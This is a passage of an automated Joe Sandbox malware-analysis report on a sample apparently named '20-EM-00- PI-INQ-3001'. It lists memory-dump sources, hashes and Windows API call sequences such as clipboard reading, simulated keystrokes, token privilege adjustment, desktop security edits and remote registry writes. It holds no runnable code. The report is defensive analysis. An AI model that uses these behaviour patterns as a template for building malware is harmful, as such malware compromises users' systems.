                                          • Opcode Fuzzy Hash: 5c21af349769ba64d16079ec47d2319b28b4e52abce5bacbe9940f4081d17de8
                                          • Instruction Fuzzy Hash: CCC04C70454019DFEB15A750DC99AF8767CAF00701F1410D5B145A10A1D5B05BC5CE11
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                          • Instruction ID: 494bb14852c776536c45d204932ac4b6fccdbb131e471ae370bf6ba0f2fd0a9e
                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                          • Instruction Fuzzy Hash: DA31F670A00105DFCB18DF59C4809A9F7B6FF59304B64AAA5E40AEB651D7B1EDC1CBC0
                                          APIs
                                          • Sleep.KERNELBASE(000001F4), ref: 00FF22B1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1690070618.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_ff0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                          • Instruction ID: 2fb22f8e250dc9323bcfcecb8e28a99395d3581bb5d1966d9268163aaf9a8d79
                                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                          • Instruction Fuzzy Hash: 20E0E67498110EDFDB00EFB8D5496AE7FB4EF04311F100161FD01D2280D6309D509A72
                                          APIs
                                            • Part of subcall function 00DF2612: GetWindowLongW.USER32(?,000000EB), ref: 00DF2623
                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00E7CE50
                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E7CE91
                                          • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00E7CED6
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E7CF00
                                          • SendMessageW.USER32 ref: 00E7CF29
                                          • _wcsncpy.LIBCMT ref: 00E7CFA1
                                          • GetKeyState.USER32(00000011), ref: 00E7CFC2
                                          • GetKeyState.USER32(00000009), ref: 00E7CFCF
                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E7CFE5
                                          • GetKeyState.USER32(00000010), ref: 00E7CFEF
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E7D018
                                          • SendMessageW.USER32 ref: 00E7D03F
                                          • SendMessageW.USER32(?,00001030,?,00E7B602), ref: 00E7D145
                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00E7D15B
                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00E7D16E
                                          • SetCapture.USER32(?), ref: 00E7D177
                                          • ClientToScreen.USER32(?,?), ref: 00E7D1DC
                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00E7D1E9
                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E7D203
                                          • ReleaseCapture.USER32 ref: 00E7D20E
                                          • GetCursorPos.USER32(?), ref: 00E7D248
                                          • ScreenToClient.USER32(?,?), ref: 00E7D255
                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E7D2B1
                                          • SendMessageW.USER32 ref: 00E7D2DF
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E7D31C
                                          • SendMessageW.USER32 ref: 00E7D34B
                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00E7D36C
                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00E7D37B
                                          • GetCursorPos.USER32(?), ref: 00E7D39B
                                          • ScreenToClient.USER32(?,?), ref: 00E7D3A8
                                          • GetParent.USER32(?), ref: 00E7D3C8
                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E7D431
                                          • SendMessageW.USER32 ref: 00E7D462
                                          • ClientToScreen.USER32(?,?), ref: 00E7D4C0
                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00E7D4F0
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E7D51A
                                          • SendMessageW.USER32 ref: 00E7D53D
                                          • ClientToScreen.USER32(?,?), ref: 00E7D58F
                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00E7D5C3
                                            • Part of subcall function 00DF25DB: GetWindowLongW.USER32(?,000000EB), ref: 00DF25EC
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E7D65F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                          • String ID: @GUI_DRAGID$F$pr
                                          • API String ID: 3977979337-1436871235
                                          • Opcode ID: 17ab545e86b88f7d9d9d9cefdbe6646cbe2d1f9220328d04015e743590ea33af
                                          • Instruction ID: a09561424ad4cbbdda7abbb8913140548d7eee871dcfd5d41584d1695b7f7773
                                          • Opcode Fuzzy Hash: 17ab545e86b88f7d9d9d9cefdbe6646cbe2d1f9220328d04015e743590ea33af
                                          • Instruction Fuzzy Hash: 8842A130204241AFD725CF68CC44FAABBE9FF48718F24952DF699A72A0C731D955CB92
                                          APIs
                                          • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00E7873F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: %d/%02d/%02d
                                          • API String ID: 3850602802-328681919
                                          • Opcode ID: 5a5f8a265a92fe32e30f79ffa6a7fc92c869e9fef7cf3749f83559e200bd89f8
                                          • Instruction ID: 411d5017ecb72bf95b2e9557d9a08d6bffd056b7b02c997c8df98420c3d17040
                                          • Opcode Fuzzy Hash: 5a5f8a265a92fe32e30f79ffa6a7fc92c869e9fef7cf3749f83559e200bd89f8
                                          • Instruction Fuzzy Hash: D112E171540204AFEB248F65CD4DFAA7BF4EF59714F20A129F91AFA2A1DF708981CB50
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _memmove$_memset
                                          • String ID: 0w$DEFINE$Oa$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                          • API String ID: 1357608183-332139107
                                          • Opcode ID: e5b5f0bb159db7735a4f74973a632084d1072757d6f9e1e72bb9699d2103f406
                                          • Instruction ID: c321d4dc877ddfb2b779fab81fa0c294009ac851c2a8da1a381c957d55fca7df
                                          • Opcode Fuzzy Hash: e5b5f0bb159db7735a4f74973a632084d1072757d6f9e1e72bb9699d2103f406
                                          • Instruction Fuzzy Hash: 8F93A171E00215DBDB24CFA8D881BEDB7B1FF48314F65916AE955BB280E770AE81CB50
                                          APIs
                                          • GetForegroundWindow.USER32(00000000,?), ref: 00DF4A3D
                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E2DA8E
                                          • IsIconic.USER32(?), ref: 00E2DA97
                                          • ShowWindow.USER32(?,00000009), ref: 00E2DAA4
                                          • SetForegroundWindow.USER32(?), ref: 00E2DAAE
                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E2DAC4
                                          • GetCurrentThreadId.KERNEL32 ref: 00E2DACB
                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E2DAD7
                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00E2DAE8
                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00E2DAF0
                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 00E2DAF8
                                          • SetForegroundWindow.USER32(?), ref: 00E2DAFB
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E2DB10
                                          • keybd_event.USER32(00000012,00000000), ref: 00E2DB1B
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E2DB25
                                          • keybd_event.USER32(00000012,00000000), ref: 00E2DB2A
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E2DB33
                                          • keybd_event.USER32(00000012,00000000), ref: 00E2DB38
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E2DB42
                                          • keybd_event.USER32(00000012,00000000), ref: 00E2DB47
                                          • SetForegroundWindow.USER32(?), ref: 00E2DB4A
                                          • AttachThreadInput.USER32(?,?,00000000), ref: 00E2DB71
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                          • String ID: Shell_TrayWnd
                                          • API String ID: 4125248594-2988720461
                                          • Opcode ID: 49e0ac39da35270ecb8d183a9bca984791bf9364699c3e3f87e643137ef300b0
                                          • Instruction ID: 6ef945d2b50617a5b103d1b1314891132fee5e74483479d851a4458c77bc6104
                                          • Opcode Fuzzy Hash: 49e0ac39da35270ecb8d183a9bca984791bf9364699c3e3f87e643137ef300b0
                                          • Instruction Fuzzy Hash: 76313271A44318BFEB21AFA29C49FBF7F6CEB44B50F114025FA05FA1D1D6B05D50AAA0
                                          APIs
                                            • Part of subcall function 00E48CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E48D0D
                                            • Part of subcall function 00E48CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E48D3A
                                            • Part of subcall function 00E48CC3: GetLastError.KERNEL32 ref: 00E48D47
                                          • _memset.LIBCMT ref: 00E4889B
                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00E488ED
                                          • CloseHandle.KERNEL32(?), ref: 00E488FE
                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E48915
                                          • GetProcessWindowStation.USER32 ref: 00E4892E
                                          • SetProcessWindowStation.USER32(00000000), ref: 00E48938
                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E48952
                                            • Part of subcall function 00E48713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E48851), ref: 00E48728
                                            • Part of subcall function 00E48713: CloseHandle.KERNEL32(?,?,00E48851), ref: 00E4873A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                          • String ID: $default$winsta0
                                          • API String ID: 2063423040-1027155976
                                          • Opcode ID: ec97db828ff1137db5ffda39c18b08a22855defd15add2d5a719bb2c6e04bf4f
                                          • Instruction ID: bfc5fdd681e093fc047ce1c83f9d6aeecb530952a40889b9a860b68aba53ed47
                                          • Opcode Fuzzy Hash: ec97db828ff1137db5ffda39c18b08a22855defd15add2d5a719bb2c6e04bf4f
                                          • Instruction Fuzzy Hash: 13818E71C00209AFDF11DFA4ED45AEE7BB8EF08348F08512AF924B6161DB718E54EB61
                                          APIs
                                          • OpenClipboard.USER32(00E7F910), ref: 00E64284
                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 00E64292
                                          • GetClipboardData.USER32(0000000D), ref: 00E6429A
                                          • CloseClipboard.USER32 ref: 00E642A6
                                          • GlobalLock.KERNEL32(00000000), ref: 00E642C2
                                          • CloseClipboard.USER32 ref: 00E642CC
                                          • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00E642E1
                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 00E642EE
                                          • GetClipboardData.USER32(00000001), ref: 00E642F6
                                          • GlobalLock.KERNEL32(00000000), ref: 00E64303
                                          • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00E64337
                                          • CloseClipboard.USER32 ref: 00E64447
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                          • String ID:
                                          • API String ID: 3222323430-0
                                          • Opcode ID: bd8e28e1c28d30ca0594d2fb594ff506bf6ddf6fb7197ca81304d95a2bbffb96
                                          • Instruction ID: 2ea7ea9529ffa0ed9440a5bf51738dc60eb757314686c000bceebef5ba70ca34
                                          • Opcode Fuzzy Hash: bd8e28e1c28d30ca0594d2fb594ff506bf6ddf6fb7197ca81304d95a2bbffb96
                                          • Instruction Fuzzy Hash: 2751BF71244206AFD310EF61EC96FBE77A8EB84B44F105529F55AF21E1DF30D9488B62
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00E5C9F8
                                          • FindClose.KERNEL32(00000000), ref: 00E5CA4C
                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E5CA71
                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E5CA88
                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E5CAAF
                                          • __swprintf.LIBCMT ref: 00E5CAFB
                                          • __swprintf.LIBCMT ref: 00E5CB3E
                                            • Part of subcall function 00DF7F41: _memmove.LIBCMT ref: 00DF7F82
                                          • __swprintf.LIBCMT ref: 00E5CB92
                                            • Part of subcall function 00E138D8: __woutput_l.LIBCMT ref: 00E13931
                                          • __swprintf.LIBCMT ref: 00E5CBE0
                                            • Part of subcall function 00E138D8: __flsbuf.LIBCMT ref: 00E13953
                                            • Part of subcall function 00E138D8: __flsbuf.LIBCMT ref: 00E1396B
                                          • __swprintf.LIBCMT ref: 00E5CC2F
                                          • __swprintf.LIBCMT ref: 00E5CC7E
                                          • __swprintf.LIBCMT ref: 00E5CCCD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                          • API String ID: 3953360268-2428617273
                                          • Opcode ID: 2aa4c2bf0c12721b5d3c1302eec0dae0403b520fb5a587ef47f6b046695bb371
                                          • Instruction ID: d6b7c53db75f6b4835fc67d8931dc5ecddff20ce731e22f9b82df475b521a221
                                          • Opcode Fuzzy Hash: 2aa4c2bf0c12721b5d3c1302eec0dae0403b520fb5a587ef47f6b046695bb371
                                          • Instruction Fuzzy Hash: ECA13EB1508308AFC704EB64D895EBFB7ECEF94705F404929F686D6191EA34DA48CB72
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00E5F221
                                          • _wcscmp.LIBCMT ref: 00E5F236
                                          • _wcscmp.LIBCMT ref: 00E5F24D
                                          • GetFileAttributesW.KERNEL32(?), ref: 00E5F25F
                                          • SetFileAttributesW.KERNEL32(?,?), ref: 00E5F279
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00E5F291
                                          • FindClose.KERNEL32(00000000), ref: 00E5F29C
                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00E5F2B8
                                          • _wcscmp.LIBCMT ref: 00E5F2DF
                                          • _wcscmp.LIBCMT ref: 00E5F2F6
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00E5F308
                                          • SetCurrentDirectoryW.KERNEL32(00EAA5A0), ref: 00E5F326
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E5F330
                                          • FindClose.KERNEL32(00000000), ref: 00E5F33D
                                          • FindClose.KERNEL32(00000000), ref: 00E5F34F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                          • String ID: *.*
                                          • API String ID: 1803514871-438819550
                                          • Opcode ID: 1ac841002657d40157d1ab7e6e5330cdbfd4f5b84383663aa5651c0c1f562b99
                                          • Instruction ID: 33b24c538bbf39843169279a0cd309cff576982b3bab1effc70aef06acaf2558
                                          • Opcode Fuzzy Hash: 1ac841002657d40157d1ab7e6e5330cdbfd4f5b84383663aa5651c0c1f562b99
                                          • Instruction Fuzzy Hash: F231C2765002196EDF10DBB4EC58ADE73ECAF09366F1455B6E808F30A0EB30DA89CA54
                                          APIs
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E70BDE
                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00E7F910,00000000,?,00000000,?,?), ref: 00E70C4C
                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00E70C94
                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00E70D1D
                                          • RegCloseKey.ADVAPI32(?), ref: 00E7103D
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00E7104A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Close$ConnectCreateRegistryValue
                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                          • API String ID: 536824911-966354055
                                          • Opcode ID: c2ad8626b1a926af0dd2760f230a67afa19fd76b200794a0ee1b154074af6b56
                                          • Instruction ID: 6cbd969e1abae2eb183469b2fc3f48c780f43f2cc00352054ef42f523c5b9e39
                                          • Opcode Fuzzy Hash: c2ad8626b1a926af0dd2760f230a67afa19fd76b200794a0ee1b154074af6b56
                                          • Instruction Fuzzy Hash: 620249756006019FCB14EF24C891A2AB7E5FF89714F05D85DF98AAB362CB70ED41CB91
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00E5F37E
                                          • _wcscmp.LIBCMT ref: 00E5F393
                                          • _wcscmp.LIBCMT ref: 00E5F3AA
                                            • Part of subcall function 00E545C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00E545DC
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00E5F3D9
                                          • FindClose.KERNEL32(00000000), ref: 00E5F3E4
                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00E5F400
                                          • _wcscmp.LIBCMT ref: 00E5F427
                                          • _wcscmp.LIBCMT ref: 00E5F43E
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00E5F450
                                          • SetCurrentDirectoryW.KERNEL32(00EAA5A0), ref: 00E5F46E
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E5F478
                                          • FindClose.KERNEL32(00000000), ref: 00E5F485
                                          • FindClose.KERNEL32(00000000), ref: 00E5F497
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                          • String ID: *.*
                                          • API String ID: 1824444939-438819550
                                          • Opcode ID: d0e6418d65d11096b648c2601aa7790d54c7077ca1ced91e2286aa5536790f79
                                          • Instruction ID: ae9500259fa96ba71ee7347435dfa8bc00fa87c15aff107583d7e057587c06a8
                                          • Opcode Fuzzy Hash: d0e6418d65d11096b648c2601aa7790d54c7077ca1ced91e2286aa5536790f79
                                          • Instruction Fuzzy Hash: AC31C2715012196FDF10DB64EC88AEF77AC9F09365F1416B5EC54B30A0DB30DA89CA64
                                          APIs
                                            • Part of subcall function 00E4874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E48766
                                            • Part of subcall function 00E4874A: GetLastError.KERNEL32(?,00E4822A,?,?,?), ref: 00E48770
                                            • Part of subcall function 00E4874A: GetProcessHeap.KERNEL32(00000008,?,?,00E4822A,?,?,?), ref: 00E4877F
                                            • Part of subcall function 00E4874A: HeapAlloc.KERNEL32(00000000,?,00E4822A,?,?,?), ref: 00E48786
                                            • Part of subcall function 00E4874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E4879D
                                            • Part of subcall function 00E487E7: GetProcessHeap.KERNEL32(00000008,00E48240,00000000,00000000,?,00E48240,?), ref: 00E487F3
                                            • Part of subcall function 00E487E7: HeapAlloc.KERNEL32(00000000,?,00E48240,?), ref: 00E487FA
                                            • Part of subcall function 00E487E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E48240,?), ref: 00E4880B
                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E4825B
                                          • _memset.LIBCMT ref: 00E48270
                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E4828F
                                          • GetLengthSid.ADVAPI32(?), ref: 00E482A0
                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00E482DD
                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E482F9
                                          • GetLengthSid.ADVAPI32(?), ref: 00E48316
                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E48325
                                          • HeapAlloc.KERNEL32(00000000), ref: 00E4832C
                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E4834D
                                          • CopySid.ADVAPI32(00000000), ref: 00E48354
                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E48385
                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E483AB
                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E483BF
                                          Memory Dump Source
